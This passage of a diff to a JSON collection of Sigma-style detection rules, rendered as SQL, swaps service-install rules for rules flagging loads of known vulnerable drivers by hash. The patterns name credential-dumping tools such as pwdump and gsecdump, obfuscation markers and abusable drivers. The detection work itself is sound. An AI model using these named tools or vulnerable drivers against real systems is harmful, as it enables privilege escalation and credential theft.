((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - 
"attack.s0029" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
"attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' 
AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' ESCAPE '\\' OR Hashes LIKE '%MD5=490b1f404c4f31f4538b36736c990136%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d063c9422a19944cdaa6714623f2ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=dacb62578b3ea191ea37486d15f4f83c%' ESCAPE '\\' OR Hashes LIKE '%MD5=2da209dde8188076a9579bd256dc90d0%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ba6afe0ea182236f98365bd977adfdf%' ESCAPE '\\' OR Hashes LIKE '%MD5=4c016fd76ed5c05e84ca8cab77993961%' ESCAPE '\\' OR Hashes LIKE '%MD5=ad22a7b010de6f9c6f39c350a471a440%' ESCAPE '\\' OR Hashes LIKE '%MD5=79483cb29a0c428e1362ec8642109eee%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%MD5=ccf523b951afaa0147f22e2a7aae4976%' ESCAPE '\\' OR Hashes LIKE '%MD5=736c4b85ce346ddf3b49b1e3abb4e72a%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0baac4d6cbac384a633c71858b35a2e%' ESCAPE '\\' OR Hashes LIKE '%MD5=798de15f187c1f013095bbbeb6fb6197%' ESCAPE '\\' OR Hashes LIKE '%MD5=a86150f2e29b35369afa2cafd7aa9764%' ESCAPE '\\' OR Hashes LIKE '%MD5=b941c8364308990ee4cc6eadf7214e0f%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd04cd3de0c19bede84e9c95a86b3ca8%' ESCAPE '\\' OR Hashes LIKE '%MD5=6909b5e86e00b4033fedfca1775b0e33%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b91a44a488e4d539f2e55476b216024%' ESCAPE '\\' OR Hashes LIKE '%MD5=8b287636041792f640f92e77e560725e%' ESCAPE '\\' OR Hashes LIKE '%MD5=07f83829e7429e60298440cd1e601a6a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0395b4e0eb21693590ad1cfdf7044b8b%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b058945c9f2b8d8ebc485add1101ba5%' ESCAPE '\\' OR Hashes LIKE '%MD5=0067c788e1cb174f008c325ebde56c22%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2c1b8c00b99e913d992a870ed478a24%' ESCAPE '\\' OR Hashes LIKE '%MD5=84ba7af6ada1b3ea5efb9871a0613fc6%' ESCAPE '\\' OR Hashes LIKE '%MD5=dbc415304403be25ac83047c170b0ec2%' ESCAPE '\\' OR Hashes LIKE '%MD5=31469f1313871690e8dc2e8ee4799b22%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d465b4487dc81effaa84f122b71c24f%' ESCAPE '\\' OR Hashes LIKE '%MD5=64efbffaa153b0d53dc1bccda4279299%' ESCAPE '\\' OR Hashes LIKE '%MD5=b164daf106566f444dfb280d743bc2f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7c72a7e1d42b0790773efd8700e24952%' ESCAPE '\\' OR Hashes LIKE '%MD5=56a515173b211832e20fbc64e5a0447c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2eb4539a4f6ab6edd01bdc191619975%' ESCAPE '\\' OR Hashes LIKE '%MD5=d1bac75205c389d6d5d6418f0457c29b%' ESCAPE '\\' OR Hashes LIKE '%MD5=68dde686d6999ad2e5d182b20403240b%' ESCAPE '\\' OR Hashes LIKE '%MD5=a785b3bc4309d2eb111911c1b55e793f%' ESCAPE '\\' OR Hashes LIKE '%MD5=6ab7b8ef0c44e7d2d5909fdb58d37fa5%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=d9ce18960c23f38706ae9c6584d9ac90%' ESCAPE '\\' OR Hashes LIKE '%MD5=ab53d07f18a9697139ddc825b466f696%' ESCAPE '\\' OR Hashes LIKE '%MD5=ba5f0f6347780c2ed911bbf888e75bef%' ESCAPE '\\' OR Hashes LIKE '%MD5=13ee349c15ee5d6cf640b3d0111ffc0e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a237fa07ce3ed06ea924a9bed4a6b99%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa222bed731713904320723b9c085b11%' ESCAPE '\\' OR Hashes LIKE '%MD5=0898af0888d8f7a9544ef56e5e16354e%' ESCAPE '\\' OR Hashes LIKE '%MD5=e076dadf37dd43a6b36aeed957abee9e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f27c09cc8680e06b04d6a9c34ca1e08%' ESCAPE '\\' OR Hashes LIKE '%MD5=1b32c54b95121ab1683c7b83b2db4b96%' ESCAPE '\\' OR Hashes LIKE '%MD5=715572dfe6fb10b16f980bfa242f3fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a06bcd96ef0b90a1753a805b4235f28%' ESCAPE '\\' OR Hashes LIKE '%MD5=f242cffd9926c0ccf94af3bf16b6e527%' ESCAPE '\\' OR Hashes LIKE '%MD5=7ed6030f14e66e743241f2c1fa783e69%' ESCAPE '\\' OR Hashes LIKE '%MD5=0d6fef14f8e1ce5753424bd22c46b1ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=a4fda97f452b8f8705695a729f5969f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=62c18d61ed324088f963510bae43b831%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5a642329cce4df94b8dc1ba9660ae34%' ESCAPE '\\' OR Hashes LIKE '%MD5=a641e3dccba765a10718c9cb0da7879e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed07f1a8038596574184e09211dfc30f%' ESCAPE '\\' OR 